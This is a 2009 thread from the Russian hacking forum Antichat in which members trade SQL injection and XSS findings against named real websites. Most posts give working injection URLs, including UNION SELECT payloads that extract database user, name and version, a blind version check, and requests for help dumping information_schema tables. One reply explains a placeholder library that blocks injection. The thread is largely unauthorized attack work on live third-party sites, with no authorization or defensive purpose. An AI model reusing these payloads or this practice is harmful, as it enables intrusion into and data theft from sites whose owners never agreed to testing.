ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
07.01.2009, 17:42
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
http://www.heroeswm.ru/battlechat.php?warid[]=
Чё означает эта ошибка?
NOT_A_SCALAR_PLACEHOLDER_0 явно свидетельствует об использовании библиотеки для работы с БД, заменяющая так называемые плейсхолдеры ? в SQL-запросах на те данные, которые указаны в качестве аргументов к функции выполнения запросов. Данные в аргументах обрабатываются в соответствии с типом, что исключает возможность проведения SQL-инъекций. В данном случае используется DbSimple от Дмитрия Котерова, уязвимости здесь нет.
Сообщение от LiRvD08
При добавлений задачи на http://cronjob.ru появилась следующая ошибка:
Код:
Warning: mysql_result() [function.mysql-result]: Unable to jump to row 0 on MySQL result index 7 in /sql/hosts/cronjob.ru/act.php on line 54
Интересно что это значит.  Значит MySQL вернул пустой результат, т.е. в коде отсутствует проверка с помощью функции mysql_num_rows()
Сообщение от zifanchuck
спс
вот начал подбирать имена таблиц и тут ввел mysql.user и ответ получил не такой как всегда:
MySQL Error: Access denied for user 'dsturman'@'208.113.192.0/255.255.224.0' to database 'mysql' может тут какая-то привязка по ИР
все просто - у текущего пользователя dsturman нет доступа к базе данных mysql
Сообщение от Vlad3d
http://hackzona.net/index.php?id=p=authorization&auth_username=111-222-1933email@address.com&auth_password=%5C%22&auth_au tomatic=off
http://hackzona.net/?id=1'&s=silvermail.info
вообще хз что значит
Код:
Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in /home/users/s/slavon-x86/docs/sql/main.php on line 14
на лицо ошибка в логике скрипта, однако SQL-инъекцию здесь вряд ли можно провести, так как данные обрабатываются функцией preg_match(). Об этом свидетельствует ошибка : preg_match() expects parameter 2 to be string, array given при передаче массива в параметре id:
http://hackzona.net/?id[]=1&s=silvermail.info
Последний раз редактировалось [Raz0r]; 07.01.2009 в 17:58..
|
|
|
08.01.2009, 06:40
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
http://www.moreyspiers.com/gallery.php?cat_id=14'
непохек?
|
|
|
|
08.01.2009, 10:57
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980
Репутация:
930
|
|
Код:
http://www.tk-expo.ru/news/?id=-8+GROUP+BY+9--
кол-во столбцов = 9
inj не получается..
кто сделает отпишите какой должен быть запрос для inj  |
|
|
|
08.01.2009, 11:59
|
|
Banned
Регистрация: 30.01.2008
Сообщений: 32
Провел на форуме:
143465
Репутация:
32
|
|
http://www.photosale.ru/find/search.php
XSS
|
|
|
|
08.01.2009, 12:07
|
|
Banned
Регистрация: 30.01.2008
Сообщений: 32
Провел на форуме:
143465
Репутация:
32
|
|
http://kadet.ru/index.php?page=guest
XSS
|
|
|
|
08.01.2009, 12:10
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489
Репутация:
1359
|
|
2z00man
Код:
http://www.tk-expo.ru/news/?id=8+and+51=ascii(substring(version(),1,1))--
3я ветка мускула. |
|
|
|
08.01.2009, 12:34
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789
Репутация:
227
|
|
Сообщение от tsesar
http://www.photosale.ru/find/search.php
XSS
Сообщение от tsesar
http://kadet.ru/index.php?page=guest
XSS
И?
|
|
|
|
08.01.2009, 12:40
|
|
Banned
Регистрация: 30.01.2008
Сообщений: 32
Провел на форуме:
143465
Репутация:
32
|
|
просто так выложил)))))
|
|
|
|
08.01.2009, 14:06
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от sabe
непохек?
http://www.moreyspiers.com/gallery.php?cat_id=-15'+union+select+1,concat_ws(0x3a,User(),Database( ),Version()),3,4,5,6,7,8+--+
Сообщение от R1dex
Раскрытие путей..
Не торопись
|
|
|
|
08.01.2009, 15:37
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980
Репутация:
930
|
|
Код:
http://www.oceanworld.com.au/page.asp?id=-8+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
выводиться поле 2, при попытки вместо 2 написать version() или user() - ошибка
vesion(): mysqld-5.0.18-nt
Код:
http://www.oceanworld.com.au/page.asp?id=-8+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+from+information_schema.tables--
как сделать вывод??? |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Raz0r]](/avatars/avatar33548.jpg?1041919){kind=avatar}
Похожие темы
Линейный вид
